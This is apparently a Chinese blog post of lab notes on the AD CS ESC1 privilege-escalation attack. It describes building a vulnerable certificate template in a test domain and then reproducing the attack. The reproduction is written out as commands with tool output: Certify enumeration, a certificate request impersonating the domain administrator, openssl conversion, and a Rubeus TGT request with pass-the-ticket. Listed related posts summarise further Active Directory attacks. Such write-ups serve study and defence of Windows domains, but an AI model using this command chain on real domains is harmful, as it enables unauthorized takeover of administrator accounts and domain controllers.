域渗透笔记-ADCS 域提权-ESC1

最新推荐文章于 2025-04-01 15:16:07 发布
最新推荐文章于 2025-04-01 15:16:07 发布
阅读量2.4k 收藏 3
点赞数 1
分类专栏: 域渗透 文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45746286/article/details/128847512
版权
文章详细介绍了ADCS中的证书模板如何被用于ESC1漏洞的利用,包括证书模板的设置、漏洞的利用条件和环境配置。利用此漏洞,攻击者可以为其他用户请求证书,进行特权升级。通过Certify工具和Rubeus工具,展示了漏洞复现过程,包括获取证书、转换格式和利用证书获取TGT的过程,以及遇到的错误和解决办法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

简介:

AD CS(Active Directory 证书服务)中的企业CA使用证书模板定义设置颁发证书,这些证书模板是注册策略和预定义证书设置的集合,并包含诸如此证书的有效期是多长?、证书的用途是什么?、主题是如何指定的?、谁可以申请证书?,以及无数其他设置。证书模板有一组特定的设置,这使得它们非常容易受到攻击。

ESC1原理:

当证书模板允许指定subjectAltName时,就可以为另一个用户请求证书。如果EKU指定客户端身份验证或ANY,则可以将其用于特权升级。

ESC1利用条件:

ESC1要成功利用要满足三个点
1、需要有权限去获取证书
2、能够登记为客户端身份验证或智能卡登录等
3、CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT开启

ESC1漏洞环境配置:

首先进入证书颁发机构

选中证书模板,右键管理

接着创建一个具有以上3个利用条件的证书模板
选中工作站身份验证

右键复制模板
模板命名为ESC1

扩展中的应用程序策略中加入客户端身份认证

接着在安全中加入注册权限
这里可以直接给Authenticated Users组或者domain users组赋予注册权限

使用者名称中选择在请求中提供

保存后,我们在证书颁发机构证书模板上右键颁发

这样,我们得ESC1漏洞环境就搭建完成了

ESC1漏洞复现:

这里用来检查证书配置需要用到一款工具Certify
https://github.com/GhostPack/Certify
编译完成后一般是一个exe和一个dll

把他传到域内机器上
执行命令

Certify.exe find /vulnerable

C:\Users\zhangsan\Desktop>Certify.exe find /vulnerable

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.1.0

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=test,DC=com'

[*] Listing info about the Enterprise CA 'test-CA-CA'

    Enterprise CA Name            : test-CA-CA
    DNS Hostname                  : CA.test.com
    FullName                      : CA.test.com\test-CA-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_AD
VANCED
    Cert SubjectName              : CN=test-CA-CA, DC=test, DC=com
    Cert Thumbprint               : D4794268C1A11EB6877159494DBEDA10B660F003
    Cert Serial                   : 23DF32EB2D08A38247F914CC783027BF
    Cert Start Date               : 2023/2/1 10:03:05
    Cert End Date                 : 2028/2/1 10:13:04
    Cert Chain                    : CN=test-CA-CA,DC=test,DC=com
    UserSpecifiedSAN              : Disabled
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal

      Allow  Enroll                                     NT AUTHORITY\Authenticat
ed UsersS-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators
      S-1-5-32-544
      Allow  ManageCA, ManageCertificates               TEST\Domain Admins
      S-1-5-21-295968744-3078858767-2203154064-512
      Allow  ManageCA, ManageCertificates               TEST\Enterprise Admins
      S-1-5-21-295968744-3078858767-2203154064-519
    Enrollment Agent Restrictions : None

[!] Vulnerable Certificates Templates :

    CA Name                               : CA.test.com\test-CA-CA
    Template Name                         : ESC1
    Schema Version                        : 2
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : NONE
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : 客户端身份验证
    mspki-certificate-application-policy  : 客户端身份验证
    Permissions
      Enrollment Permissions
        Enrollment Rights           : NT AUTHORITY\Authenticated UsersS-1-5-11
                                      TEST\Domain Admins            S-1-5-21-295
968744-3078858767-2203154064-512
                                      TEST\Domain Computers         S-1-5-21-295
968744-3078858767-2203154064-515
                                      TEST\Enterprise Admins        S-1-5-21-295
968744-3078858767-2203154064-519
      Object Control Permissions
        Owner                       : TEST\Administrator            S-1-5-21-295
968744-3078858767-2203154064-500
        WriteOwner Principals       : TEST\Administrator            S-1-5-21-295
968744-3078858767-2203154064-500
                                      TEST\Domain Admins            S-1-5-21-295
968744-3078858767-2203154064-512
                                      TEST\Enterprise Admins        S-1-5-21-295
968744-3078858767-2203154064-519
        WriteDacl Principals        : TEST\Administrator            S-1-5-21-295
968744-3078858767-2203154064-500
                                      TEST\Domain Admins            S-1-5-21-295
968744-3078858767-2203154064-512
                                      TEST\Enterprise Admins        S-1-5-21-295
968744-3078858767-2203154064-519
        WriteProperty Principals    : TEST\Administrator            S-1-5-21-295
968744-3078858767-2203154064-500
                                      TEST\Domain Admins            S-1-5-21-295
968744-3078858767-2203154064-512
                                      TEST\Enterprise Admins        S-1-5-21-295
968744-3078858767-2203154064-519



Certify completed in 00:00:00.6992794

主要看这儿

三点全部满足,开始尝试利用
给域管administrator申请一个证书

Certify.exe request /ca:CA.test.com\test-CA-CA /template:ESC1 /altname:administrator

但是编译出来的exe有点问题

重新找了个项目
https://github.com/Hagrid29/CertifyKit
原本以为是编译的有问题,最后发现是2012虚拟机系统有问题–
最后换了一台2016机器成功了

CertifyKit.exe request /ca:CA.test.com\test-CA-CA /template:ESC1 /altname:administrator

接着把pem格式的证书复制保存txt中,改名cert.pem
然后复制进kali中
接着转换格式

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

接着把pfx格式的证书重新拉进攻击机上,同时使用Rubeus工具获取tgt
https://github.com/GhostPack/Rubeus

在获取tgt之前,我们尝试访问域控上的文件,发现无法访问

使用Rubeus获取tgt(接下来重新搭建了一个相同的域环境重新做的–之前搭建的域环境系统镜像有问题)

Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /dc:192.168.52.131 /ptt

这里遇到了一个报错
KRB-ERROR (62) : KDC_ERR_CLIENT_NOT_TRUSTED

解决方法:
本地管理员权限,打开组策略gpedit.msc,计算机配置\Windows 设置\安全设置\本地策略\安全选项,找到配置 Kerberos 允许的加密类型,将下面全部勾选即可

然后我重启完了还是不行–
然后等了一会又自己好了–就很无语
然后查询了下报错

最快的解决方法:

看了下别人的回答,应该是独立的证书服务器颁发的证书没受到域控制器信任

但是我这莫名其妙就好了。。。到底啥情况我也说不清–
反正是成功获取到了tgt

这时候已经可以访问域控的文件了

ADCS攻击系列【ESC1-8】详解
总有人间一两风,填我十万八千梦
09-11 582
ADCS(Active Directory Certificate Services),是微软供的一套证书服务解决方案,用于实现公钥基础结构(PKI)的功能,包括证书的产生、管理、存储、分发和撤销等。ADCS能够与现有的Active Directory Domain Services(ADDS)服务结合,用于加密文件系统、数字签名以及身份验证等多种安全应用场景。在ADCS中,证书颁发机构(CA)扮演着核心角色,负责接收证书申请、验证申请者信息、颁发证书以及管理证书的吊销等。
ADCS ESC1+ESC4+CVE-2022–26923
问题很多的小明
06-27 612
ADCS域渗透相关
ADCSsync:基于ESC1执行DCSync技术和哈希转储的强大工具
FreeBuf_的博客
03-14 1378
该工具首先会获取传入的Bloodhound转储文件中的每个用户和,然后使用Certipy针对每个用户发出请求,并将他们的PFX文件存储在证书目录中。需要注意的是,整个执行过程会比较慢,可能需要一点时间才能完成,但ADCSsync仍是一种转储NTLM哈希的有效方法。ADCSsync是一款功能强大的临时性DCSync技术测试工具,该工具基于ESC1实现其功能,虽然该工具在运行速度方面没有优势,但ADCSsync能够在不使用。-o, --output TEXT NTLM哈希输出文件 [必须]
ADCS-ESC1漏洞环境构造与利用
信息安全
02-24 1500
ESC1 漏洞利用中,攻击者通过一系列操作获取包含管身份信息的证书后,利用 Rubeus.exe 工具,使用该证书获取 TGT 票据。:开启 CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT 标志,此标志允许通过_CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT_声明自身身份,从而实现伪装成管理员的目的,这是 ESC1 攻击得以实施的关键步骤。:证书具备身份验证功能,例如登记为客户端身份验证,只要证书存在用于验证的相关功能,即可满足该攻击条件。
ADCS-ESC3漏洞环境构造与利用,从零基础到精通,收藏这篇就够了!
最新发布
Python_0011的博客
04-01 671
ESC3漏洞就像一个定时炸弹,一旦配置不当,就会给黑客留下可乘之机。所以,一定要重视证书颁发过程中的配置安全,避免出现任何疏漏。修复建议:严格控制证书模板的注册限,不要随意开放给Authenticated Users。禁止不必要的证书申请代理策略,避免被恶意利用。确保CA服务器的配置安全,定期检查并更新。及时修补ADCS服务相关漏洞,亡羊补牢,为时未晚。记住,安全不是一句口号,而是需要我们时刻警惕,并付诸行动的责任!黑客/网络安全学习包资料目录成长路线图&学习规划配套视频教程。
ADCS证书服务器攻击中看集安全(上)
ZAWX_NETSTARSEC的博客
05-11 284
(2)当client发送身份信息给AS后,AS会先向活动目录AD请求,询问是否有此Client用户,如果有的话,就会取出它的 NTLM-Hash,并对 AS_REQ 请求中加密的时间戳进行解密,如果解密成功,则证明客户端供的密码正确,如果时间戳在五分钟之内,则预认证成功。接着从-----BEGIN RSA PRIVATE KEY----------END CERTIFICATE-----复制出来,保存为ESC1.pem,然后利用openssl来转换为ESC1.pfx,无需设置密码。
域渗透入门练习(MS14-068)
ai_64的博客
04-09 622
一、漏洞说明 微软在2014年1118日发布了一个紧急补丁,修复了一个影响全部版本Windows服务器的严重漏洞。该补丁用于解决Microsoft Windows Kerberos KDC漏洞(CVE-2014-6324),该漏洞允许黑客升任意普通用户限成为管理员(Domain Admin)身份。也就是说,你在一台普通用户的机器上利用这个漏洞,那么这个用户就变成管理员限,然后,该...
ADCS攻击之证书模板配置错误 ESC1
Adminxe的博客
03-05 1179
表示允许 Active Directory 中任何经过身份验证的用户请求基于此证书模板生成的新证书。表示将基于此证书模板生成的证书可用于对 Active Directory 中的计算机进行身份验证。表示基于此证书模板申请新证书的用户可以为其他用户申请证书,即任何用户,包括管理员用户。注:将生成的cert.pem先保存到txt,然后重命名为cert.pem。pem转换pfx证书,直接回车,不需要输入密码,申请TGT票据。右键复制工作站身份认证模板,做一些修改。认证后的用户/用户随便勾一个就行了。
域渗透笔记-ADCS -ESC4
NoooEmotion的博客
02-06 1242
AD CS(Active Directory 证书服务)中的企业CA使用证书模板定义设置颁发证书,这些证书模板是注册策略和预定义证书设置的集合,并包含诸如此证书的有效期是多长?、证书的用途是什么?、主题是如何指定的?、谁可以申请证书?,以及无数其他设置。证书模板有一组特定的设置,这使得它们非常容易受到攻击。
终于有人把域渗透ADCS证书攻击讲透了
weixin_65550121的博客
12-09 2391
PKI是一个术语,有些地方会采用中文的表述——公钥基本结构,用来实现证书的产生、管理、存储、分发和撤销等功能。我们可以把他理解成是一套解决方案,这套解决方案里面需要有证书颁发机构,有证书发布,证书撤掉等功能。
域渗透之内网
hackzkaq的博客
11-12 2742
搜索公众号:白帽子左一,领配套练手靶场,全套安全课程及工具 在windows中,限种类还是比较多,但我们涉及到的基本就三个 User(普通用户限)、Administrator(管理员限)和system(系统限) 一、方法 常用的方法 系统内核溢出 数据库 错误的系统配置 组策略首选项 DLL劫持 滥用高限令牌 第三方软件/服务 二、内核溢出 电脑里的数据就好比水缸里的水,正常情况下水满了就不会在向水缸里注水 如果继续注入,水就会溢出到外界从而污染外界
域渗透笔记-ADCS -ESC3
NoooEmotion的博客
02-03 604
AD CS(Active Directory 证书服务)中的企业CA使用证书模板定义设置颁发证书,这些证书模板是注册策略和预定义证书设置的集合,并包含诸如此证书的有效期是多长?、证书的用途是什么?、主题是如何指定的?、谁可以申请证书?,以及无数其他设置。证书模板有一组特定的设置,这使得它们非常容易受到攻击。
简单的内的
m0_74326506的博客
07-11 2472
42287:微软规定一台机器的机器账号名以$结尾,但又没有做验证,所以一台机器叫dc的话,可以创建有着机器账户属性的dc账户44278:用dc账户向AS申请TGT票据后,然后去向TGS申请ST,在申请ST的时候删除dc这个账户,那么KDC在验证时就查不到dc这个账户,进而查到dc$这个账户,于是就将ST颁给dc¥这个账户。
ADCS-CVE-2022-26923漏洞-
问题很多的小明
07-10 480
本文复现了ADCS漏洞CVE-2022-26923
CVE-2020-1472 利用(
墨痕诉清风的博客
01-25 2415
控(Win2008):192.168.199.131 用户(Win7):192.168.199.128 用户(Win03):192.168.199.129 漏洞验证工具:https://github.com/SecuraBV/CVE-2020-1472 利用+重置工具:https://github.com/risksense/zerologon 重置hexpass 工具:https://github.com/dirkjanm/CVE-2020-1472 工具运行环境:https://.
域渗透 | 利用DnsAdmins到SYSTEM
Ms08067安全实验室
04-12 1101
文章来源|MS08067 公众号读者投稿本文作者:VastSky(Ms08067实验室读者)一、前言 在域渗透中,我们获得DNS管理员(DNSAdmin)限后,可以使用dnscmd.e...
[内网渗透]—kerberos&(pth、wmic)
Sentiment的博客
12-08 618
在 Kerberos 认证中,最主要的问题是如何证明「你是你」的问题,如当一个 Client 去访问 Server 服务器上的某服务时,Server 如何判断 Client 是否有限来访问自己主机上的服务,同时保证在这个过程中的通讯内容即使被拦截或篡改也不影响通讯的安全性,这正是 Kerberos 解决的问题。在域渗透过程中 Kerberos 协议的攻防也是很重要的存在。Kerberos 主要是用在环境下的身份认证协议。PsExec是SysInternals套件中的一款强大的软件。
2021-09-25 内网域渗透(五-1
m0_51170293的博客
10-01 394
咕咕咕。。。 目的:低限到高限,从而扩大战果 手段: 本地溢出漏洞(未打补丁前下) 数据库 第三方软件(向日葵,teamview~) 1本地溢出漏洞:用户输入的数据超过了缓存区的长度 ms16-032漏洞,这个漏洞16年发布的,版本对象是 以普通用户的身份添加administrator以system限运行程序 条件:目标机要有两个以上的cpu核心,并且powershell是v2.0及更高版本 Windows Vista Windows 7 Windows 8.1 Wind
用户
wuxinweii的博客
11-21 3630
MS14-068漏洞利用 什么是MS14-068漏洞? 在kerberos 协议中,Client去访问Server,需要知道是否具有访问限。所以微软在KRB_AS_REP中的TGT中增加了Client的PAC(特属性证书),也就是Client的限,包括Client的User的SID、Group的SID。 ms14-068 漏洞就是在经过身份验证的Client在TGT中伪造高限的PAC。 该漏洞允许任何一个普通用户,将自己升至管理员限。微软给出的补丁号kb3011780。 MS14-068是非
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值